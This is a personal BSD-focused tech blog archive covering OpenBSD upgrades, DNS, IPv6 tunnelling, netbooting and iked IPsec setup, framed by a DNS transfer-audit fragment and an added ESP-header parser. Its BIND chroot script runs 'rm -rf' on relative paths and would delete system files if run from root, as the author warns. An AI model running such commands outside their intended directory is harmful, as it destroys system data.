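                                 for a, b in zip(times, times[1:])],
        }
        for when, src in xfers[zone]:
            if src not in allowed:
                findings.append(("transfer-from-unlisted-source", zone, src))
        if len(times) >= 2 and followed == len(times):
            findings.append(("transfer-after-every-soa-check", zone, None))
    return zones, findings


if __name__ == "__main__":
    print(audit(SAMPLE_LOG, allowed={"200.46.208.61"}))
```
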



I miss you!

October 2nd, 2011

The blackbird (Turdus merula) here has disappeared. I can't see them any more and someone told me they had a mass dying. Some virus perhaps. Here is a picture I took of a blackbird in Schweinfurt a few years ago during winter feeding on my parents' porch. They were cheerful birds always singing very loud and getting on someone's nerves while I was programming. But now that it's all silent, I kinda miss the dang things. May you have better fares in the place you are now!



My Business Card

October 4th, 2011

I got 100 business cards made for EuroBSDCon. I got the idea at BSDCon 2000 where I got at least 10 or so cards from 10 people. Here is what mine looks like:

I'm getting on a train tomorrow so this should be the last blog entry before October 10th. I'm not going to have guaranteed 'net but if I do I have an OTP skey system set up that allows me to reach an account on my DSL.



Photos from EuroBSDCon 2011

October 10th, 2011

I got back home earlier today from the hotel in Maarssen. Here are some photos that I made of people and the venue. Enjoy. Email me if you are in these photos and want them removed.

Photos from EuroBSDCon 2011.

Unfortunately many photos turned out blurry and distorted, I decided not to put those ones up. Maybe I need a new camera.



Goodbye, World (Celebrating the life of Dennis Ritchie)

October 13th, 2011

I saw a similar posting on Slashdot...

#include <stdio.h>
#include <stdlib.h>

int
main(void)
{
	printf("Goodbye, World.\n");
	exit(0);
}

I bought the book "The ANSI C Programming Language" (second edition) three times in my life. One is in the hands of a stranger who I gave this book to at the GTABUG BSD Usergroup meet in Toronto. But this article is not about the book but rather the author of this book who recently died. Rest in Peace Dennis Ritchie, and may everyone who was touched by your wonderful creations celebrate your life! Mourn death, but celebrate life. Thanks for making me understand (somewhat)!



The FreeBSD German Documentation Project

October 15th, 2011

At EuroBSDCon I had the pleasure to speak to Benedict Reuschling who is involved in the German documentation project. They are always looking for more people able to translate from English to German. Here is their website.

When I was at EuroBSDCon I had the honour of talking with Benedict Reuschling, who works on the FreeBSD German Documentation Project. They are always looking for more people who can translate English to German. Here is the project's website.



Did you know you could get BSD Certified?

October 16th, 2011

At EuroBSDCon I met and spoke a bit with Dru Lavigne. She does the BSD Certifications at most major BSD events. All in all a good thing if you live in a place where certifications are important. If I go to EuroBSDCon next year I'll try to do the certification myself. The website is here at bsdcertification.org. I also made a photo of Dru but it turned out very blurred so I can't share that, sorry.



German Trojan, some thoughts

October 19th, 2011

This story is circulating. I noticed that the programs being spied on are programs that use encryption, and that's probably what the police are out to get at: encryption keys, or seeing what someone is doing that they can't see by simply wiretapping the line. I noticed they are interested in Skype (which uses encryption). What it comes down to is that there is a frustration out there that the cops want to see through the encryption of end-users that they suspect for whatever reasons. In a way this is a nicer way of peeking through encryption than installing X amounts of supercomputers to crack the encryption used, it's likely also cheaper. The underlying problem of creating a police state is real though. So where do you find a median? We can't turn encryption off as some countries dictate because organized crime will get to us before the cops can protect us, and the losses will be huge. We can't install supercomputers because they suck up too much energy and cost too much. So what can the cops do to track criminals? It's not so easy, why don't you send me your thoughts? Lastly we don't want to put the cops in a position where they can surveil anyone or everyone without a court order.



Rocket Scientists, why can't this be done?

October 24th, 2011

I was wondering why humans insert rockets in a circular orbit around the earth first and then gun the engines to "escape". First a picture of how it's done currently.

I envision space craft going directly up into the sun toward L1 Lagrange. Basically it's ascending straight up, followed by a coast and then possibly ion engines backed by possible lasers (for energy) from the ground, in order to stay at this Lagrange point.

Basically up there it's like an eagle's nest in the mountains. You experience day at all times, see the earth lit at all times, and are able to move between other Lagrange points with little to no chemical energy. Also accessing the moon from there should be no problem.



7 Billion Humans

October 26th, 2011

Here is a United Nations report that says we'll hit 7 Billion (estimate) Humans in five days. I gotta say congratulations to the human race, but at the same time I'm worried because in the 1970's we had just 4 Billion people on earth.

Here is the Universal Declaration of Human Rights that SHOULD give every human, every one of our 7 Billion, the rights that are the foundation of freedom, justice and peace.

I have some issues with the large number of people as mentioned above, but let me ask some questions. How are we going to feed everyone? Oil is running out, how can we keep relative comforts for everyone? More fresh water is polluted every day, how can we ensure drinking water for everyone? Machinery is taking away humans' work, how can we accept being unemployed because of it? We realise we live on a planet in space, how can we ever accept that there are other species elsewhere?



OpenBSD 5.0 Released

November 1st, 2011

Well I was hoping to give you news of my CD's having arrived but they aren't here yet. So I did an FTP of the install50.iso file for the amd64 architecture and upgraded 2 vm's so far. I've made a screen shot:

Screenshot

Well as you can tell by the screenshot LibreOffice is in 5.0 instead of OpenOffice. This is amazing! Also Facebook stopped working for the 4.9 browser a few days ago. The browser bundled with OpenBSD 5.0 makes Facebook work again. Yay! Let's hope this will be as consistent and stable as the 4.9 release. I'll be upgrading uranus.centroid.eu soonish.



uranus upgraded

November 4th, 2011

I've upgraded my dear box uranus to OpenBSD 5.0. Downtime was about one hour as I was upgrading packages as well in single user mode. Some packages didn't want to be upgraded, and I'll have to sort that out. Otherwise it worked like a charm.

kern.version=OpenBSD 5.0 (GENERIC.MP) #59: Wed Aug 17 10:19:44 MDT 2011
    deraadt@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC.MP

That's the version of the kernel running on it now.



Got a new VPS

November 7th, 2011

I got a new VPS. It's called io.solarscale.de. I got this because goldflipper.net was down for 1.5 days and my DNS was hanging on a string. The new host io doesn't do DNS just yet but it will in the next few days. One bonus is that it does IPv6, and one drawback is that it's not BSD. Oh well. I'll be comparing goldflipper.net and io for the next year and a half and decide which one I will keep running. It's a matter of quality of service.

$ host www.centroid.eu
www.centroid.eu has address 78.47.14.22
www.centroid.eu has address 200.46.208.61
www.centroid.eu has IPv6 address 2001:a60:f074:4::1
www.centroid.eu has IPv6 address 2a01:4f8:d13:1980::22

As you can see www.centroid.eu is DNS load shared between three hosts. io and goldflipper for IPv4 and uranus and io for IPv6.



Upgraded Anti-Virus

November 11th, 2011

Today I bought anti-virus for my Windows 7 vm. I was 1 day away from losing my support and subscription so I bought it for this and 2 other PC's for a year's subscription. I believe all Windows computers need anti-virus and I even bought anti-virus for my dad's Mac. It's very important to keep malware out.



Rant on oil

November 12th, 2011

I'm worried about the human race. Ever since the great wars in the 1940's we've been using gasoline and oil based fuels to power our economies. Our economies pride themselves on having multiple trading partners, so as to not rely on one partner too much, yet we don't do this with transportation means such as cars. People are lazy too. They will boycott buying gasoline _for a day_ to make statements but it doesn't get any results. What we have to do as a human race is to strip ourselves free of this dependency and create a _mix_ of transportation means so that we don't fall into poverty when there is no more oil. Guys ride your bikes more often! Mayors! Ban cars in cities unless they are electric! We can't sleep on this or else we'll be poor as we were in the beginning of the industrial revolution when the oil runs out. Let's try to have 50% electric cars and 50% gasoline cars by 2020! I wager that in 2022 the oil will run out if not sooner.



Donated 25 euros to Wikipedia

November 15th, 2011

Donation time is coming around again and I'm making more money as I have a job this year so I thought I'd spend a little more. Here is a comment I was able to put up for my money.

Thinking of donating to a few other projects now that I'm at it.



chroot script for Bind 9.8.1-P1 and FreeBSD 7.4-STABLE

November 17th, 2011

I noticed that the install process on FreeBSD is different from the Makefile provided with BIND 9.8.1-P1. So I made a script that you execute inside the build directory of BIND 9.8.1-P1. Make sure you only run this there. Never run this on /, it will delete stuff out of the system!

#!/bin/sh
# Run from the top of the BIND 9.8.1-P1 build directory only. Every path
# without a leading slash is relative to the current directory, so running
# this from / removes system headers and man pages.

# remove headers and man pages under ./usr
rm -rf usr/include/isccc
rm -rf usr/include/dns
rm -rf usr/include/dst
rm -rf usr/include/isccfg
rm -rf usr/include/bind9
rm -rf usr/include/lwres
rm -rf usr/share/man/man5
rm -rf usr/share/man/man8
rm -rf usr/share/man/man1

# directory layout used inside the chroot
mkdir -p usr/local/sbin
mkdir -p usr/bin
mkdir -p usr/sbin
mkdir -p usr/lib
mkdir -p usr/libexec
mkdir -p usr/share/mk
mkdir -p libexec
mkdir -p lib
mkdir -p usr/include/isc
mkdir -p usr/local/share/man/man3
mkdir -p usr/share/man/man3
mkdir -p usr/share/man/man8

# make, its rule files, a shell and the runtime linker
cp /usr/bin/make usr/bin/make
cp /usr/share/mk/* usr/share/mk/
cp /bin/sh bin/
cp /libexec/ld-elf.so.1 libexec
cp /libexec/ld-elf.so.1.old libexec
cp /libexec/ld-elf32.so.1 libexec
cp /libexec/ld-elf32.so.1.old libexec

# shared libraries for the copied binaries
cp /lib/libedit.so.6 lib
cp /lib/libncurses.so.7 lib
cp /lib/libncursesw.so.7 lib
cp /lib/libc.so.7 lib

# utilities the install step calls
cp /usr/bin/install usr/bin/
cp /bin/rm bin/
cp /bin/ln bin/
cp /usr/bin/sed usr/bin/
cp /bin/mkdir bin/

# install with the build directory as the root
chroot `pwd` make install

Be sure to look this script over before you run it. It will install most bind9 stuff under the "usr" directory, which doesn't exist in the bind9 directory. Cheers!



Profiling DNS answers

November 19th, 2011

Out of boredom I dumped the answers of A RR's for centroid.eu from my 3 different nameservers in production for that zone. I made pictures too.

In conclusion:

Have a nice day!



Netbooting OpenBSD/macppc

November 21st, 2011

I activated mars.centroid.eu (not on IPv6 yet). It took me a while to boot the kernel on it because it has a broken cdrom, and my external CDROM was not detected on it. So I had to netboot it. I'd like to document the experience.

In /etc/dhcpd.conf-em5:

subnet 172.16.2.0 netmask 255.255.255.0 {
        option routers 172.16.2.1;

        range 172.16.2.240 172.16.2.254;

        host mars {
                hardware ethernet 00:30:65:a1:ec:a6;
                fixed-address 172.16.2.2;

                filename "ofwboot";
                next-server 172.16.2.1;
                option root-path "/tftpboot";
        }

}

In /etc/inetd.conf:

172.16.2.1:tftp         dgram   udp     wait    root    /usr/libexec/tftpd      tftpd -s /tftpboot

In /etc/exports:

/tftpboot       172.16.2.2

Then, of course, turn on portmap, nfsd, and mountd, kill -HUP inetd, and start dhcpd on em5. That did not boot it automatically, but when you do a set image bsd.rd in ofwboot on the macppc machine and then boot, it should boot into the kernel.

The boot command is: boot enet:,ofwboot /bsd.rd ... It will first do a DHCP lookup to get the IP and then download ofwboot from the TFTP server. It will then NFS mount /tftpboot and download the kernel bsd.rd from there. From then on it'll boot normally into the install disk.



mars.centroid.eu dmesg

November 22nd, 2011

I've owned this computer 10 years now. When I bought it it ran OpenBSD 3.0 or so (back when there was still OpenBSD powerpc). In the meantime it loaded Mac OS X, ran for my parents and then it was mothballed... well I saved it didn't I.

[ using 490376 bytes of bsd ELF symbol table ]
console out [ATY,Rage128Pd]console in [keyboard] , no keyboard attached, trying usb anyway
: memaddr 94000000 size 4000000, : consaddr 96008000, : ioaddr 90020000, size 20000: memtag 8000, iotag 8000: width 640 linebytes 768 height 480 depth 8
Copyright (c) 1982, 1986, 1989, 1991, 1993
        The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2011 OpenBSD. All rights reserved.  http://www.OpenBSD.org

OpenBSD 5.0 (GENERIC) #69: Wed Aug 17 10:17:02 MDT 2011
    deraadt@macppc.openbsd.org:/usr/src/sys/arch/macppc/compile/GENERIC
real mem = 805306368 (768MB)
avail mem = 768524288 (732MB)
mainbus0 at root: model PowerMac5,1
cpu0 at mainbus0: 7400 (Revision 0x209): 450 MHz: 1MB backside cache
mem0 at mainbus0
spdmem0 at mem0: 256MB SDRAM non-parity PC133CL2
spdmem1 at mem0: 256MB SDRAM non-parity PC133CL2
spdmem2 at mem0: 256MB SDRAM non-parity PC133CL2
memc0 at mainbus0: uni-n
kiic0 at memc0 offset 0xf8001000
iic0 at kiic0
mpcpcibr0 at mainbus0 pci: uni-north, Revision 0xff
pci0 at mpcpcibr0 bus 0
pchb0 at pci0 dev 11 function 0 "Apple Uni-N AGP" rev 0x00
vgafb0 at pci0 dev 16 function 0 "ATI Rage Fury" rev 0x00, mmio
wsdisplay0 at vgafb0 mux 1: console (std, vt100 emulation)
mpcpcibr1 at mainbus0 pci: uni-north, Revision 0x16
pci1 at mpcpcibr1 bus 0
pchb1 at pci1 dev 11 function 0 "Apple Uni-N" rev 0x00
macobio0 at pci1 dev 23 function 0 "Apple Keylargo" rev 0x03
openpic0 at macobio0 offset 0x40000: version 0x4614 little endian
macgpio0 at macobio0 offset 0x50
macgpio1 at macgpio0 irq 47
pgs0 at macgpio0: irq 55
"i2s" at macobio0 offset 0x10000 not configured
"escc-legacy" at macobio0 offset 0x12000 not configured
zsc0 at macobio0 offset 0x13000: irq 22,50
zstty0 at zsc0 channel 0
zstty1 at zsc0 channel 1
"timer" at macobio0 offset 0x15000 not configured
adb0 at macobio0 offset 0x16000 irq 25: via-pmu, 0 targets
apm0 at adb0: battery flags 0x9, 0% charged
kiic1 at macobio0 offset 0x18000
iic1 at kiic1
wdc0 at macobio0 offset 0x1f000 irq 19: DMA
wd0 at wdc0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 19623MB, 40188960 sectors
atapiscsi0 at wdc0 channel 0 drive 1
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  ATAPI 5/cdrom removable
wd0(wdc0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 2
cd0(wdc0:0:1): using PIO mode 4, DMA mode 2, Ultra-DMA mode 2
wdc1 at macobio0 offset 0x20000 irq 20: DMA
wdc2 at macobio0 offset 0x21000 irq 21: DMA
ohci0 at pci1 dev 24 function 0 "Apple USB" rev 0x00: irq 27, version 1.0
ohci1 at pci1 dev 25 function 0 "Apple USB" rev 0x00: irq 28, version 1.0
"TI TSB12LV26 FireWire" rev 0x00 at pci1 dev 26 function 0 not configured
usb0 at ohci0: USB revision 1.0
uhub0 at usb0 "Apple OHCI root hub" rev 1.00/1.00 addr 1
usb1 at ohci1: USB revision 1.0
uhub1 at usb1 "Apple OHCI root hub" rev 1.00/1.00 addr 1
mpcpcibr2 at mainbus0 pci: uni-north, Revision 0x16
pci2 at mpcpcibr2 bus 0
pchb2 at pci2 dev 11 function 0 "Apple Uni-N Eth" rev 0x00
gem0 at pci2 dev 15 function 0 "Apple Uni-N GMAC" rev 0x01: irq 41, address 00:30:65:a1:ec:a6
lxtphy0 at gem0 phy 0: LXT971 10/100 PHY, rev. 1
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
bootpath: /pci@f2000000/mac-io@17/ata-4@1f000/disk@0:/bsd
root on wd0a swap on wd0b dump on wd0b



My C Primer hits 10,000 views

November 22nd, 2011

The C primer I wrote (with corrections from other guys) has hit 10,000 views. It's very popular on the Internet it seems. I thank you for the views if you visited it, and I hope you were not disappointed. My goal is to make newbies able to write input and output of data with the C programming language. I don't know if I succeeded, but I got a thank you for this before.



mars loses harddrive, new SSD ordered

November 25th, 2011

Mars died with an uncorrectable data error in the harddrive. I made backups from it and I'm going to build what this guy did: SSD in a powermac G4 Cube. It cost 147 euros for the card and the adapter and I hope it'll work out. The positive thing is that I can reuse the SSD if I don't like mars anymore.



Hacking on Natally again

November 29th, 2011

I'm back hacking on Natally. This time I want to put in routines for NAT for IPv6. Basically I want to give my network a ULA block and then use the IPv6's on my VPS which do a "redirect" back. All this because Hetzner Online doesn't allow extra "true" V6 /64's for VPS customers, we just get 1 which have to be bound on the external interface or we get no routing. So this is where natally comes in. I'm doing this too because I don't know how long the sixxs.net tunnel at my provider will last. I heard they have a pilot project to get native v6 already without tunnels so perhaps one day the tunnelling will cease and I might lose my v6 block. Also VDSL is rolled out but not at my provider so I may want to switch one day. We'll see.



mars is back

December 5th, 2011

Well I finally was able to put the SSD in mars. Here's a clip from the dmesg as that's all that's changed:

$ dmesg|grep wd0
wd0 at wdc0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA48, 61057MB, 125045424 sectors
wd0(wdc0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 2
root on wd0a swap on wd0b dump on wd0b

The speed is pretty nice. I can upload to the box at 5MB/s and reading and writing files is somewhere between 15 and 18 MB/s. And the best thing about the G4 Cube is now that it's soooo purring quiet (minus the purring).



Sample IPv6 traceroute through Natally

December 7th, 2011

I have set it up so that Natally which is run on a Linux VPS tunnels for an OpenBSD client. Here is a demonstration:

# sh run        
opened tun0 for communications
# ifconfig tun0
tun0: flags=51 mtu 1500
        priority: 0
        groups: tun
        status: active
        inet6 fd00:1000::1 ->  prefixlen 64
# host www.v6.facebook.com
www.v6.facebook.com has IPv6 address 2620:0:1cfe:face:b00c::3
# route add -inet6 2620:0:1cfe:face:b00c::3 fd00:1000::2
add host 2620:0:1cfe:face:b00c::3: gateway fd00:1000::2
# traceroute6 www.v6.facebook.com
traceroute6 to www.v6.facebook.com (2620:0:1cfe:face:b00c::3) from 2001:a60:f074::30, 64 hops max, 12 byte packets
 1  * * *
 2  2a01:4f8:d13:6::1  20.055 ms  14.481 ms  11.987 ms
 3  2a01:4f8:0:d0:4:0:10:2  29.143 ms hos-tr2.juniper1.rz10.hetzner.de  20.25 ms 2a01:4f8:0:d0:3:0:10:2  26.594 ms
 4  hos-bb1.juniper4.ffm.hetzner.de  15.75 ms  15.841 ms  16.297 ms
 5  20gigabitethernet4-3.core1.fra1.he.net  17.108 ms  17.924 ms  18.068 ms
 6  10gigabitethernet5-3.core1.lon1.he.net  35.179 ms  40.085 ms  31.783 ms
 7  10gigabitethernet7-4.core1.nyc4.he.net  104.398 ms  104.567 ms  99.631 ms
 8  10gigabitethernet2-3.core1.ash1.he.net  103.884 ms  106.854 ms  103.058 ms
 9  2001:470:0:1bf::2  104.096 ms  104.525 ms  104.519 ms
10  ae2.bb01.iad1.tfbnw.net  104.524 ms  104.846 ms ae1.bb02.iad1.tfbnw.net  104.712 ms
11  ae14.bb01.sjc1.tfbnw.net  165.751 ms ae12.bb02.sjc1.tfbnw.net  165.193 ms  168.688 ms
12  ae2.pr01.sjc1.tfbnw.net  165.496 ms  165.883 ms ae0.pr01.sjc1.tfbnw.net  166.808 ms
13  * *^C

As you can see the first hop is through Hetzner Online (20 ms latency due to my DSL) which is my VPS provider. I still have ideas for Natally in v6 mode so stay tuned.



2011, a look back

December 10th, 2011

Last year we did the "look back" on December 10th as well so here is a sum up for this year that passed (hard to believe 2011 is almost over)...

January 4th - Received the Lanner FW 7530B per parcel
January 21st - 1st mention of SVP Radio
January 31st - quit the proteus VPS and transfer of solarscale.de to joker.com
February 2nd - CKLN my favourite radio station at the time has until Feb. 12
		to shut down..
February 4th - got a DSL upgrade (contract for 2 years) 18 Mbps down/ 1Mbps up
February 18th - did clock.centroid.eu IPv6 traceroute faker with time display
March 12th - first mention of Fukushima nuclear powerplant meltdown
April 17th - CKLN 88.1 goes off air
April 19th - Wildcarddnsd at BETA_6
April 26th - Demonstration against nuclear power
April 29th - Upgraded to OpenBSD 4.9
May 8th - Ordered two books on PHP
May 19th - Stargate Universe (SGU) show is over and will be missed...
May 20th - found a bug in dspam which is used at one work of mine
May 21st - 1 to 4 documentary on Hip-Hop in Toronto featured
May 27th - I'm back working, for 1.5 euros an hour (no minimum wage)
June 2nd - cleaned heatsink and reduced CPU temperature article
June 5th - bought a book on Windows System programming
June 13th - source code to exploit to crash Speedport W303V Type A router
June 25th - my second windows program
July 22nd - Space Shuttle Atlantis does its final landing
July 30th - upgraded my dads macbook to OS X Lion
August 5th - turned on comments on this blog
August 6th - got a new VOIP phone (Grandstream GXP 2100)
August 7th - showcase of SVPRadio with pictures from the Compudoc
August 10th - 1/6 of my Internet traffic is over IPv6
September 3rd - Free Bradley Manning (billboard sighted in Kansas City)
September 17th - Wildcarddnsd does passive AXFR now
September 28th - first draft of Wildcarddnsd Handbook written
October 2nd - Our blackbirds are observed to be reduced in numbers 
October 4th - Business cards for EuroBSDCon 2011
October 10th - Photos from EuroBSDCon 2011
October 13th - Dennis Ritchie, father of C and UNIX dies
October 26th - the world reaches 7 billion humans
November 1st - OpenBSD 5.0 Released
November 4th - uranus upgraded to OpenBSD 5.0
November 7th - got a new VPS from Hetzner Online, this one is io.solarscale.de
November 11th - upgraded anti-virus
November 15th - donated 25 euros to wikipedia
November 17th - BIND 9.8.1-P1 is released fixing a nasty bug
November 21st - netbooting OpenBSD/macppc
December 5th - mars.centroid.eu (OpenBSD/macppc) is back with a new SSD drive
December 7th - Natally does IPv6 redirects now (sorta like NAT but not PAT)

This year was a very good year for me. Hoping to make it even better in 2012!



Natally enables IPv6 on my parents computer Neptun

December 11th, 2011

I finished porting the changes I've made to the OpenBSD client for natally to Linux. On my parents' computer I'm then able to do:

root@neptun:/etc# ping6 ipv6.google.com
PING ipv6.google.com(bw-in-x69.1e100.net) 56 data bytes
64 bytes from bw-in-x69.1e100.net: icmp_seq=1 ttl=53 time=81.6 ms
64 bytes from bw-in-x69.1e100.net: icmp_seq=2 ttl=53 time=80.2 ms
^C
--- ipv6.google.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 80.248/80.927/81.607/0.736 ms

Besides Google, Facebook also works over IPv6 (www.v6.facebook.com). I'm very happy that natally works the way I planned for it. In the future though I'm going to make some routing code changes with it... stay tuned for that.



Solstice in 5 days

December 17th, 2011

Once again the solstice is upon us. For northern people like me, it's the winter solstice. For southerners like Australians the summer solstice is approaching. This solstice according to Wikipedia is on the 22nd of December.



Merry Christmas and Happy Solstice!

December 22nd, 2011

Well Christmas isn't around truly yet, but I'm sure Maria felt something by now, those 2000 some odd years ago. I want to wish you a happy solstice today and, you may not know this, the solstice is for me Christmas and New Year's in one. But I do honor the Christian tradition too and we don't open our presents until the 24th (24th is German tradition to open presents on xmas eve).



Throwing out the productions of 2011

December 22nd, 2011

Early this year (sometime in April or so) I made 2 shows for SVP Radio which have never been broadcast. They deal with OpenBSD and have all songs by OpenBSD on them. I DJ these songs together in a random order. If you're interested in listening to my mediocre voice and good OpenBSD songs then go ahead. Free 2 hour listening.

The shows are up to date until OpenBSD 4.8 song. The rest of the songs you can find at OpenBSD. Thanks to OpenBSD for the songs!



Goodbye Facebook

December 23rd, 2011

I finally left Facebook. I never really needed it. And hopefully all my friends who Facebook said will miss me, will actually miss me. If they leave Facebook I'll be there on old methods like email.



Donation to the Pirates

December 27th, 2011

Yesterday I was systematically going through the website of the Pirate Party of Germany. At first I was a little shy about them, now I think they are my party. The good thing is that you can vote for them twice. Once with your money and once with your vote. I donated 10 euros to them which I will money transfer to them tomorrow. For all those that use computers and internet as much as I do and aren't convinced they are _the_ party to vote for, I urge you to look at the politics section of their website and make up your own mind. Invest 40 minutes, which I did, to really take a look at the program. Sure there are some things missing like defence and finances as well as foreign relations but their priority number 1 for politics is to make the Internet political topic number 1. I don't expect them to win the elections but if they get into parliament it would be grand considering I vote for them.



Added a bit of Javascript

December 28th, 2011

As you can probably tell this site has been getting a bit of JavaScript and HTML5 improvements. I'm dabbling here and there with my book I got a while ago. One noticeable change on this blog is that the ads on the top will get reloaded every minute to a new one. You can see what ads there are by reading the page source. Cheers!



Turning off WPS

January 1st, 2012

According to this article (German) and a CERT advisory the key to a WPA2 network can be broken within 11,000 tries. In computers 11,000 tries isn't much.

I've found and turned off WPS on my parents' problematic Speedport W303V Type A router which had it set in the pushbutton method by default. Now it's off. At home I don't use Wi-Fi so that's safe (I have cat5 cable everywhere though).

Happy New Year 2012 everyone.



470:1 where my money goes...

January 2nd, 2012

Wikimedia has broken off the fundraiser. 1 million donors donated on average 20 dollars for the 470 million visitors that Wikipedia gets. My contribution (25 euros) was slightly above average then, I'll keep that in mind for next year. If you donated, congratulations you too support 470 others on Wikipedia.



New Comment System

January 6th, 2012

I've put up a new commenting system and fixed the io.solarscale.de instance for commenting. Hopefully this is useful.



Setting up iked on OpenBSD (my story)

January 9th, 2012

I have two hosts. One is a vmware workstation vm called dione. The other is an OpenBSD/macppc G4 Cube called mars. Both are separated by a router called uranus. In ASCII it looks a little like this:

+---------+                +---------+               +---------+
| dione   }----------------{  uranus }---------------{  mars   |
+---------+                +---------+               +---------+
2001:a60:f074::30               X                       2001:a60:f074:5::2
I want to encrypt communication with IPsec between these two hosts. Here is what my config (/etc/iked.conf) looks like on dione:
dione# grep -v ^# iked.conf

ikev2 active esp from 2001:a60:f074::30 to 2001:a60:f074:5::2 srcid "2001:a60:f074::30"  dstid "2001:a60:f074:5::2" psk "swearword!"
Here is what my config (/etc/iked.conf) looks like on mars:
# grep -v ^# /etc/iked.conf

ikev2 active esp from 2001:a60:f074:5::2 to 2001:a60:f074::30 srcid "2001:a60:f074:5::2" dstid "2001:a60:f074::30" psk "swearword!"
I also set up the following commands on dione in reference to the ikectl manual page:
dione# ikectl ca vpn create
dione# ikectl ca vpn certificate 2001:a60:f074::30 create
dione# ikectl ca vpn certificate 2001:a60:f074:5::2 create
dione# ikectl ca vpn install
dione# ikectl ca vpn certificate 2001:a60:f074::30 install
dione# ikectl ca vpn certificate 2001:a60:f074:5::2 export
dione# scp 2001_a60_f074_5__2.tgz mars:.
mars# tar -C /etc/iked -xzpf 2001_a60_f074_5__2.tgz
Then I started /sbin/iked on both machines and typed:
dione# ipsecctl -sall
FLOWS:
flow esp in from 2001:a60:f074:5::2 to 2001:a60:f074::30 peer 2001:a60:f074:5::2 srcid IPV6/2001:a60:f074::30 dstid IPV6/2001:a60:f074:5::2 type use
flow esp out from 2001:a60:f074::30 to 2001:a60:f074:5::2 peer 2001:a60:f074:5::2 srcid IPV6/2001:a60:f074::30 dstid IPV6/2001:a60:f074:5::2 type require

SAD:
esp tunnel from 2001:a60:f074:5::2 to 2001:a60:f074::30 spi 0x1ee7655a auth hmac-sha2-256 enc aes-256
esp tunnel from 2001:a60:f074::30 to 2001:a60:f074:5::2 spi 0xa0f22d34 auth hmac-sha2-256 enc aes-256
Also tcpdumping shows that the traffic is encrypted:
mars# tcpdump -v -n -i gem0 -p -X ip6 and not port 22 and not port 9999   
tcpdump: listening on gem0, link-type EN10MB
22:25:09.875931 esp 2001:a60:f074:5::2 > 2001:a60:f074::30 spi 0x1ee7655a seq 247 len 200 [class 0x10] (len 200, hlim 64)
  0000: 6100 0000 00c8 3240 2001 0a60 f074 0005  a....È2@ ..`ðt..
  0010: 0000 0000 0000 0002 2001 0a60 f074 0000  ........ ..`ðt..
  0020: 0000 0000 0000 0030 1ee7 655a 0000 00f7  .......0.çeZ...÷
  0030: 9de0 df93 049b bddc 5c94 936c 7352 d89f  .àß...½Ü\..lsRØ.
  0040: 982a 9497 c2a7 3117 930b 853b a69d 89ef  .*..§1....;¦..ï
  0050: 94a0 a7b8 9bce fa26 339b 1845 ad7f 8637  . §¸.Îú&3..E­..7
  0060: 27c0 f679 6eb9                           'Àöyn¹

22:25:09.876728 esp 2001:a60:f074::30 > 2001:a60:f074:5::2 spi 0xa0f22d34 seq 281 len 120 [class 0x10] (len 120, hlim 62)
  0000: 6100 0000 0078 323e 2001 0a60 f074 0000  a....x2> ..`ðt..
  0010: 0000 0000 0000 0030 2001 0a60 f074 0005  .......0 ..`ðt..
  0020: 0000 0000 0000 0002 a0f2 2d34 0000 0119  ........ ò-4....
  0030: 3ca6 1eb5 81c0 f64a b5a8 b2c3 b933 c896  <¦.µ.ÀöJµ¨²Ã¹3È.
  0040: fa73 17cd a054 5ff9 151e b781 3b50 5972  ús.Í T_ù..·.;PYr
  0050: 1d7d 2709 7dc8 c36c 8dcc e42b 0c86 e186  .}'.}ÈÃl.Ìä+..á.
  0060: 927b a804 50bd                           .{¨.P½
If that procedure doesn't work for you I also copied the .pub key of each respective host and stuck them into /etc/iked/pubkeys/ but I doubt that made a diff. Have a lot of fun (I only wasted 4 hours on this). Another thing worth mentioning is that the certificates created are self-signed. Iked as of 20120109 does not support self-signed certificates so the PSK method seems to be the only way. Suggestions on how to better this are always welcome.
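
The SPI and sequence number that tcpdump prints can be read straight out of the captured bytes and compared with the SAD entries from ipsecctl, which also catches packets that leave the host outside the tunnel. The following C program is an added example, not part of the original setup; the type and function names are made up for illustration, the cleartext packet is a constructed sample, and it assumes no IPv6 extension header sits between the IPv6 header and ESP.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IPV6_HDR_LEN 40
#define ESP_HDR_LEN   8     /* SPI (4 bytes) + sequence number (4 bytes) */
#define NH_ESP       50     /* IPv6 Next Header value for ESP */

enum verdict { V_ESP_KNOWN_SA, V_ESP_UNKNOWN_SA, V_NOT_ESP, V_MALFORMED };

struct esp_info {
        uint8_t  traffic_class;
        uint16_t payload_len;
        uint8_t  hop_limit;
        uint32_t spi;
        uint32_t seq;
};

/* SPIs from the SAD section of the ipsecctl -sall output in the post. */
static const uint32_t sad_spis[] = { 0x1ee7655aU, 0xa0f22d34U };

/* First 48 bytes of the two packets in the post's tcpdump output. */
const uint8_t pkt_mars_to_dione[48] = {
        0x61, 0x00, 0x00, 0x00, 0x00, 0xc8, 0x32, 0x40,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x05,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30,
        0x1e, 0xe7, 0x65, 0x5a, 0x00, 0x00, 0x00, 0xf7
};
const uint8_t pkt_dione_to_mars[48] = {
        0x61, 0x00, 0x00, 0x00, 0x00, 0x78, 0x32, 0x3e,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30,
        0x20, 0x01, 0x0a, 0x60, 0xf0, 0x74, 0x00, 0x05,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
        0xa0, 0xf2, 0x2d, 0x34, 0x00, 0x00, 0x01, 0x19
};
/* Constructed sample, not from the post: same hosts, but Next Header is
 * 6 (TCP), i.e. a packet that went out without ESP. */
const uint8_t pkt_cleartext[48] = {
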